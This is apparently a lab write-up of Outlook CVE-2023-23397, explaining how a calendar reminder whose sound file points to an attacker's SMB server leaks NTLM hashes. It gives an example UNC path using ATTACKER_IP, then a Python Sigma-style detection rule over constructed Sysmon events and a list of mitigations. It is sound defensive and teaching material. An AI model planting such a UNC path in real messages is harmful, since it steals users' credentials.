Outlook - CVE-2023-23397 - Write Up

Vulnerability:

Zero-day exploit in the Outlook calendar reminder notification

Attack Surface: NTLMv2

NTLM (NT LAN Manager) is an authentication protocol, but it has mostly been replaced by Kerberos because of its security weaknesses.

UNC path
The attacker can point the reminder sound file at a specific UNC path.
UNC paths are used on Windows to locate network resources (files, printers, shared documents). They look like this:
\\ATTACKER_IP\FOLDER\FILE.wav

Summary:

An attacker is able to send a notification/reminder to the victim's mailbox that triggers without any user interaction. The reminder is crafted using a PowerShell COM object and set to use a custom sound that is retrieved from the attacker's SMB server. When the reminder fires, Outlook sends a request to fetch the sound from the attacker's SMB server and, at the same time, sends the victim's NTLM login credentials (username and password hash) to the attacker.

Attack Vector:

Responder (Kali) is used to emulate an SMB server on TCP port 445; it captures any authentication attempt made against it.

OutlookSpy (Outlook plugin)

Lets you edit all of Outlook's internal parameters directly, including the reminder sound file. This tool is not necessary; it simply makes the vulnerability easier to test.

Defender:

Sigma rules

Sigma is for log files what Snort is for network traffic and YARA is for files. Log rules are written to help detect malicious activity across a network. Writing SIEM searches in Sigma helps avoid vendor lock-in and makes threat intel easier to share.

YARA Rules

YARA looks for patterns within files on disk and can match a file by specific byte signatures, hashes, or patterns.
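As an added example (not from the original write-up), this is the Sigma-style selection logic a defender would write for this case, run over constructed Sysmon Event ID 3 (network connection) records: OUTLOOK.EXE initiating an SMB connection (TCP 445/139) to a host outside the internal address ranges. The sample records, paths and IP addresses are constructed for the demonstration.

```python
import ipaddress

# Constructed Sysmon Event ID 3 records (not real telemetry). Fields follow
# the Sysmon schema: Image, DestinationIp, DestinationPort, Initiated.
OUTLOOK = r"C:\Program Files\Microsoft Office\root\Office16\OUTLOOK.EXE"
SAMPLE_EVENTS = [
    {"EventID": 3, "Image": OUTLOOK, "DestinationIp": "203.0.113.10",
     "DestinationPort": 445, "Initiated": True},   # SMB to an outside host: suspicious
    {"EventID": 3, "Image": OUTLOOK, "DestinationIp": "10.0.0.25",
     "DestinationPort": 445, "Initiated": True},   # internal file server: expected
    {"EventID": 3, "Image": OUTLOOK, "DestinationIp": "52.96.0.1",
     "DestinationPort": 443, "Initiated": True},   # normal HTTPS to mail service
    {"EventID": 3, "Image": r"C:\Windows\explorer.exe", "DestinationIp": "198.51.100.7",
     "DestinationPort": 445, "Initiated": True},   # not Outlook: out of scope for this rule
    {"EventID": 3, "Image": OUTLOOK, "DestinationIp": "198.51.100.7",
     "DestinationPort": 139, "Initiated": True},   # NetBIOS session to outside host
]

SMB_PORTS = {445, 139}

# Explicit RFC 1918 / loopback / link-local list. (Python's ip.is_private would
# also treat the documentation ranges used in the samples above as private.)
INTERNAL_NETS = [ipaddress.ip_network(n) for n in (
    "10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16", "127.0.0.0/8", "169.254.0.0/16")]


def is_external(ip_text: str) -> bool:
    """True when the destination is not in an internal address range."""
    ip = ipaddress.ip_address(ip_text)
    return not any(ip in net for net in INTERNAL_NETS)


def matches_outlook_smb_rule(event: dict) -> bool:
    """Sigma-style selection: Outlook itself opens SMB to a non-internal host."""
    if event.get("EventID") != 3 or not event.get("Initiated"):
        return False
    if not str(event.get("Image", "")).lower().endswith("\\outlook.exe"):
        return False
    if int(event.get("DestinationPort", 0)) not in SMB_PORTS:
        return False
    return is_external(event["DestinationIp"])


def find_alerts(events):
    """Return (destination ip, port) for every event the rule selects."""
    return [(e["DestinationIp"], e["DestinationPort"])
            for e in events if matches_outlook_smb_rule(e)]


if __name__ == "__main__":
    for ip, port in find_alerts(SAMPLE_EVENTS):
        print(f"ALERT: OUTLOOK.EXE -> {ip}:{port} (outbound SMB, possible NTLM leak)")
```

Blocking TCP 445 outbound at the perimeter, as listed under Mitigations, stops the connection itself; this rule catches the attempt so the affected mailbox can be investigated.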

Mitigations

  • Add users to a security group that prevents them from using NTLM
  • Block TCP 445/SMB outbound to limit post-exploitation
  • Always keep Outlook up to date
  • Disable the WebClient service
